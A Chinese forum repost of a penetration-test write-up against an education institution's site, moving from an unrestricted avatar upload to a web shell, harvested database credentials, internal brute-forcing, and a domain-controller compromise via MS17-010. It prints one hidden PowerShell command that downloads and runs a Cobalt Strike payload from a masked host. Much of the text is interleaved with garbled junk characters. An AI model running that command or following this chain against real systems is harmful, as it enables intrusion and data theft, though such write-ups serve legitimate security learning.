|
$ b8 O9 m0 q: c& p
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
/ Q: {, Z, _+ n, j 6 Y1 l2 b; Y7 F
1 X" h( d7 x0 e) ?6 T: @5 u- }2 z
; U" h4 {# O3 E' x5 ~0 P7 \$ g ' v/ b+ K7 {& w( D$ X) f4 q& G. T# j
1 z8 a6 h' v L# e6 `: Y% \ 正文
; X/ u7 W; P5 b) W* z7 f- t; y
8 F: Q# k" H5 C+ Y3 [, \, J! x+ R& O3 I9 z# H3 u/ L& K4 {/ x! f
Y4 }& u% e$ a0 { 8 D8 R. a5 M p) v7 y
f1 }% P) A/ _, ] 目标:www.xxxx.com(一家教育机构)
/ P# K) |4 T/ ~" \+ C$ P3 ], r
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
2 f% l7 @1 Z1 z. Q! R8 e. }" D4 r. S0 Q
@' M9 C+ O U3 z
1 D- o, V) @7 U; I( j4 O  4 X0 B. j i9 J O
$ X v+ g& i% {6 q! i
& ~ s- l8 C3 [3 h; k$ B
进行了简单的信息搜集
$ w# I# b% ^7 ?; G7 Z1 x
. ?/ K& J% O! k: u+ Q2 ^# i3 Q1 Q8 X6 W5 |3 V/ ^) a
. o/ [ a' U' r: c0 A3 |
6 n6 n R7 X+ J5 f 子域名搜集8 @! w0 L2 P8 c% Y( O3 v/ F
3 Z4 l, O# a- w. w; c: E$ D# J, p/ R w. V! E
 9 c+ ?" \# j( a
6 V8 q3 y3 \7 j
1 E( [! P7 b0 o! X2 f4 N! {. @0 X fofa找资产
U/ V1 Z5 r4 _9 e( P" B
: ?. s& X1 E2 t3 @1 r
, K7 A* d9 A6 }4 A! k' T , W3 c, ~1 r' r8 T' Q1 @
- p2 Z7 `( x2 {6 G  & Q7 \& l( ]+ e1 w7 I! \
3 Y7 \3 Q2 J$ H$ t8 _- P" R& S7 O- J5 M/ g/ H. S% U
一共七个资产。去重之后只有两个。
, P: F% [7 K8 T" d1 L- e7 c. W( t
4 Y h% ? i$ l* C
- D' N1 t' c+ ?% J; S
4 R, ]9 m# {4 G. b' \% K- W7 u) q( @9 a; l
目录探测
p* p( h( V; \9 R
" X( W9 w" Z1 X# v4 F8 ?2 j; P! D" A+ C9 ]- |" P# p+ t
 3 R8 P# n, v5 _& i# X; ~
& ~' j- n1 P7 |
' Q i1 Y3 K; i* \3 E 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
8 h8 Q& d/ n7 A# |5 }
3 z( U) u( B5 I; ~0 }. R: t3 m1 V3 l+ P: G5 Z/ r- ]8 C
1 d( v$ E% a! a- k% Z# Y! f
% m. ^0 ?( R! h/ j& Z0 }; t& |. L; [ 我又尝试了通过修改返回包来绕过登录界面
3 }& T& Z& {8 P( M5 E 8 s3 S) j9 k- C8 l
+ o6 |( p0 h% S4 X3 O$ e8 v1 d- } 
3 v( |6 C: ~1 f# [8 B / v* [: a# b' J& Y
; Y* w8 E7 B! ^9 q
还是不行,尝试注入无果! a, w0 z6 z; s0 s/ {
! N5 V8 {: m8 Y- a! L" q
0 S% L) C- J. ^1 _ 
3 i1 P) F2 K4 H$ |2 k1 D
+ O5 q" v. X3 E
! K/ L1 F; r' ^ 不过我目录探测出了一处Spring信息泄露
" l) S* @3 X) X
0 n, ?/ r a3 ^- v" b
J0 ?0 g4 H V
6 z$ I2 B v8 Q8 o5 w: r
* X1 s7 _& ?8 e 
$ r7 _* Z9 j& G 8 J. V% F( W7 T' H& [, ~# i' D
4 \% o8 i" s# ?3 ~. U6 y
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
6 |$ n6 j& I- _- C: q% `7 w4 E3 S . ?" P- v+ f: J# `/ s
3 ^5 p$ \# t X+ K9 g+ o, N/ c$ A% l
 0 G1 o6 g5 b B, |: L2 |8 X2 O
& i0 F% n! p; [6 E U9 S1 {) X+ u8 S3 \, S( X
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。' i! x: }) D6 u I
0 N: L9 g! Y9 `& B
s* p" _8 i( R" B$ k  . c- ~2 F. c# l4 l
) O$ W! j/ E+ c
4 ]8 N! k) M6 i" y* F% K
获取有些师傅到这一步就手机抓包电脑测了。
4 A( c7 v, E! _& ?, r
. i5 x$ w9 u3 p+ m6 L
! z8 Y- O- D. ~9 P6 h7 s, Y, X Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
8 b* ^( Y% V$ o0 i# q9 f; J- E1 { # v1 X0 b( b- e S; E9 ?+ |
1 M( r# y0 F, h1 L9 y a# P
其中在一个公众号发现了小程序,可以进行注册。
. |# r0 k4 h( c/ p2 \% Z% Z - A9 |6 y$ a- o8 e2 V# r8 s6 |
: ]5 l( X4 O! ~6 v8 b5 `3 k; p ~, o# C
看到了头像上传,尝试上传获取WebShell& i+ x6 h O2 z$ k. z6 ?
( r. C* x8 L* `9 [2 Z- `% W" C+ ]- ]7 k( `
 6 O/ H$ v7 [0 O- [
) Z/ @5 U; @# K5 Q
( ]: G3 g% H( F, D# o
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问2 c( Z V1 ?+ s# P; ?" z
7 |0 f& N' ]5 m! a8 g* p
/ ?+ @' H- g7 ]: d. c  ' S8 b1 |. @8 ~& F$ z! G9 Y3 t
: i; E% V3 Y- Q% e6 Y$ m* w& L2 R. L; h& m9 L7 ^* n8 ?6 E
然后上了大马
+ W+ y0 Y! J; M, S 4 H& \% T) k% u/ W, N3 E& v' a
) V0 y+ f; f1 ^, \) D
 q* n% d8 j9 U$ a
9 @- R- k' y" P$ a! H4 {( [3 A- K
7 H% k. J# g7 G* g( g/ U" M, O
; F2 ~' \" @+ x( V% V2 O : t) X5 o+ Q2 D, N7 |7 Q: {
6 q* I, @: c' x. j0 V0 A& ?& M 通过翻找文件发现数据库账号密码6 @$ e" N0 m- w, f& ^/ y
1 o5 C/ a, j. c# O
0 i5 v) E/ c( }& E; k+ k' B* q  9 I7 C9 o2 L6 D3 \- a* F F5 o
. q* ]3 C Y' T
8 X8 k# A) L- o- \3 p
--内网渗透: s/ j2 W+ s- {5 Z6 U
& g- I. l/ S' Q! r
- |6 _! B, l6 L3 M 直接通过powershell执行 cs上线7 y) z4 y7 N' N' U! _
! c- \2 j+ ~$ H
2 B; C5 [5 ]: _8 f! S powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
+ ?2 h+ H! Y- i: S3 B8 T9 G
r: ~) n$ v! x! X H
9 k0 y3 p" D# F  : L! k. x) F( E% l. c8 X5 Y
& X* `, d9 o& {
% y' Z" R7 j: a7 _+ L- U, G: k 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破8 M! k3 M5 T1 e3 }) y
* i" i, \+ @8 T; C, w# X: _0 L' {# H
5 C# i( [0 J; h+ [% X$ t. I
 & x2 w$ p. v1 w% y0 ?5 ]
1 U3 j9 L/ e6 t! M# D
# T; ~4 d; c. x# B& w5 V( `( _ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
1 I7 W: |3 b1 s& e
' J" |$ I( {: u: O1 P6 g
& C% X" q* n. t5 R: D) R, ^; o) \1 E. x) c0 e6 V1 I
6 C9 h$ Y% E( [4 k! y) J
$ f K9 v' A7 [3 G 
S0 [ _& d' X2 L# V $ U9 N$ K: r+ S0 |% V- f: g; I
4 L, Y6 U, P+ g/ p- O9 J
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
: _. h% \4 g4 r0 |# s- ~
. n2 g+ E+ \) S
% l Z3 }) ^( J4 p" W; D
x* [7 Y: \; Q" `' ^7 L, |7 E0 Z/ P' q; C: ]# {
 : T7 ?( c& ]0 a" K
z& j& W" {0 I/ F( T5 V% h9 v. j/ I, n& E5 A. @ }- e. J8 t
* C8 q2 o( z% j" q* N% `
+ @/ E6 e. s5 N7 U* G0 i) |% [
" i5 | D, z3 |+ a9 ^* z0 t - N4 a( Y V: t' J% r0 k9 o. Q- {. v
, u# H5 n( {. F }4 L8 M
M' r( _# ]) @
1 d& L+ A( j$ ~5 F2 U" H: [/ j1 k5 Q1 `! q8 o# ^0 p, Z
小结8 a0 h: ~7 N2 B# ^- k! y Q5 ~5 z
( U* o' s1 B" H' K2 ?2 m
2 V& g, M, g9 s* x6 O4 O, V' E; g
& G6 y% M: C) G Q- ? U' D# s( Z5 V1 _/ @* L6 `
. c5 A! U7 Q0 }9 i" ]1 ?- f" z1 }3 ` 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
4 z+ P8 M: B+ `+ R# H
2 m: J" o; t0 @5 P' Z7 f9 Z8 O/ g8 R" f2 I: R- o* O Z' Y* N- {3 y" v
$ }! F0 j3 C" V2 ?2 C5 w; b4 ]
* F; N/ [, ?% f! j6 @( x `; u1 i' J7 K+ }6 p
-
, G2 N9 Z, e6 y# S$ v7 I# c( Q , d' ^. m$ P7 o: I5 u
0 x. {" @& e4 t3 C# M -
1 o6 N; R& l. Y" j- ]
7 x* [$ H# f& V) L$ q- m
, M' o* G: T: y8 E* ~
/ i3 ~9 T( X0 Z" c* v, H/ J2 b; {! q5 C2 g/ N! Z
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html& [6 w, D8 [" C! \5 ^; Y0 {
* J5 W4 w! @: r8 v# e! F! u. K/ g$ O8 ]7 f8 i, ]6 A1 X9 }
+ M5 Y" L5 l6 }* T3 h% ~ | 
发表于 2024-3-1 19:41:32
收藏
支持
反对